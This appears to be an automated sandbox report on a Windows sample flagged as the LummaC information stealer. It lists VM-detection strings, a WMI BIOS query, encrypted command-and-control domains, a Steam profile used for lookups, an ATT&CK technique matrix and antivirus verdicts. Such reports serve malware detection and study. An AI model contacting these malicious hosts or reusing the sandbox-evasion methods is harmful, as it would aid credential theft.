      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe TID: 5652Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exe TID: 2060Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: Amcache.hve.4.drBinary or memory string: VMware
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000002.1665418921.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.drBinary or memory string: vmci.sys
      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.drBinary or memory string: VMware20,1
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWisu patidizirur hutemit zajorafo+Wexikoci gosabi muwidovicun pipica hekaruhoGVabuluzorejek sarifud bamayusefuruki muyawo sefalilumixulib xopi nolacuxLovicivona renuzo daferidilogejat mofe faxavugikecug wofofususefibob dahutele popizajixucom fot
      Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043C330 LdrInitializeThunk,0_2_0043C330
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_009A953B push dword ptr fs:[00000030h]0_2_009A953B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]0_2_0247092B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]0_2_02470D90

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: 3zg6i6Zu1u.exeString found in binary or memory: debonairnukk.xyz
      Source: 3zg6i6Zu1u.exeString found in binary or memory: diffuculttan.xyz
      Source: 3zg6i6Zu1u.exeString found in binary or memory: effecterectz.xyz
      Source: 3zg6i6Zu1u.exeString found in binary or memory: deafeninggeh.biz
      Source: 3zg6i6Zu1u.exeString found in binary or memory: immureprech.biz
      Source: 3zg6i6Zu1u.exeString found in binary or memory: spellshagey.biz
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Process Injection      		1
      Virtualization/Sandbox Evasion      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Screen Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin Shares2
      Clipboard Data      		3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS22
      System Information Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      3zg6i6Zu1u.exe74%VirustotalBrowse
      3zg6i6Zu1u.exe79%ReversingLabsWin32.Trojan.Smokeloader
      3zg6i6Zu1u.exe100%AviraHEUR/AGEN.1352498
      3zg6i6Zu1u.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://store.steampowered.comN0%Avira URL Cloudsafe
      https://lev-tolstoi.com/w100%Avira URL Cloudmalware
      https://lev-tolstoi.com/piGI100%Avira URL Cloudmalware
      https://community.fastly.steamstatic.c0%Avira URL Cloudsafe
      spellshagey.biz100%Avira URL Cloudmalware
      https://lev-tolstoi.com/7g100%Avira URL Cloudmalware
      https://lev-tolstoi.com/apia100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      		23.55.153.106
      		truefalse
        		high
        lev-tolstoi.com
        		172.67.157.254
        		truefalse
          		high
          sordid-snaked.cyou
          		unknown
          		unknownfalse
            		high
            diffuculttan.xyz
            		unknown
            		unknownfalse
              		high
              effecterectz.xyz
              		unknown
              		unknownfalse
                		high
                spellshagey.biz
                		unknown
                		unknowntrue
                  		unknown
                  awake-weaves.cyou
                  		unknown
                  		unknownfalse
                    		high
                    immureprech.biz
                    		unknown
                    		unknownfalse
                      		high
                      wrathful-jammy.cyou
                      		unknown
                      		unknownfalse
                        		high
                        deafeninggeh.biz
                        		unknown
                        		unknownfalse
                          		high
                          debonairnukk.xyz
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            sordid-snaked.cyoufalse
                              		high
                              deafeninggeh.bizfalse
                                		high
                                effecterectz.xyzfalse
                                  		high
                                  wrathful-jammy.cyoufalse
                                    		high
                                    https://steamcommunity.com/profiles/76561199724331900false
                                      		high
                                      awake-weaves.cyoufalse
                                        		high
                                        immureprech.bizfalse
                                          		high
                                          debonairnukk.xyzfalse
                                            		high
                                            https://lev-tolstoi.com/apifalse
                                              		high
                                              spellshagey.biztrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              diffuculttan.xyzfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://player.vimeo.com3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://lev-tolstoi.com/w3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000002.1665581700.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521070628.0000000000A76000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://steamcommunity.com/?subsection=broadcasts3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://community.fastly.steamstatic.c3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://store.steampowered.com/subscriber_agreement/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.gstatic.cn/recaptcha/3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.valvesoftware.com/legal.htm3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.youtube.com3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af63zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://store.steampowered.comN3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://s.ytimg.com;3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=13zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://steam.tv/3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWH3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://lev-tolstoi.com/3zg6i6Zu1u.exe, 00000000.00000003.1521070628.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521033479.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://store.steampowered.com/privacy_agreement/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://store.steampowered.com/points/shop/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://store.steampowered.com/privacy_agreement/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.google.com/recaptcha/3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://checkout.steampowered.com/3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://store.steampowered.com/about/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://steamcommunity.com/my/wishlist/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://help.steampowered.com/en/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/market/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://store.steampowered.com/news/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://store.steampowered.com/subscriber_agreement/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://lev-tolstoi.com/piGI3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
